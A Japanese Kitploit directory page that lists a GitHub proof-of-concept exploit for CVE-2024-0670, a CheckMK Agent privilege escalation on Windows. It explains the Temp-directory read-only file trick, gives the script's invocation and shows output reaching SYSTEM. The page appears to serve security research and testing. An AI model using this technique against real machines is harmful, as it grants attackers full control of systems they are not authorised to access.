Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-0670 — CVE-2024-0670 の PoC | Kitploit
ツール/GitHubGitHub/magicrc/cve-2024-0670
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育
GitHubmagicrc/cve-2024-0670

CVE-2024-0670

CVE-2024-0670 の PoC

リポジトリを見る
19ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2024-0670 PoC

このリポジトリは、CVE-2024-0670 脆弱性のProof of Concept (PoC) エクスプロイトを提供します。この脆弱性は、Windowsシステム上のCheckMK Agentに影響を与えます。脆弱性は、CheckMK Agentが C:\Windows\Temp ディレクトリに一時ファイルを作成し実行する際に発生します。攻撃者は、書き込み保護を設定した悪意のあるファイルをそのディレクトリに事前に配置することで、この動作を悪用できます。エージェントが読み取り専用として既に存在する一時ファイルを作成しようとすると、上書きに失敗しますが、既存のファイルをSYSTEM権限で実行し、権限昇格を可能にします。

アドバイザリ参照: SEC Consult - Checkmk Agentの書き込み可能ファイルを介したローカル権限昇格


⚠️ 免責事項

このプロジェクトは教育、研究、および許可されたセキュリティテスト目的のみを意図しています。
自身が所有していない、またはテストの明示的な許可がないシステムではこのコードを使用しないでください。
著者は、いかなる損害や誤用についても責任を負いません。


使用方法

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"

例

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer... 
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
ツールをダウンロード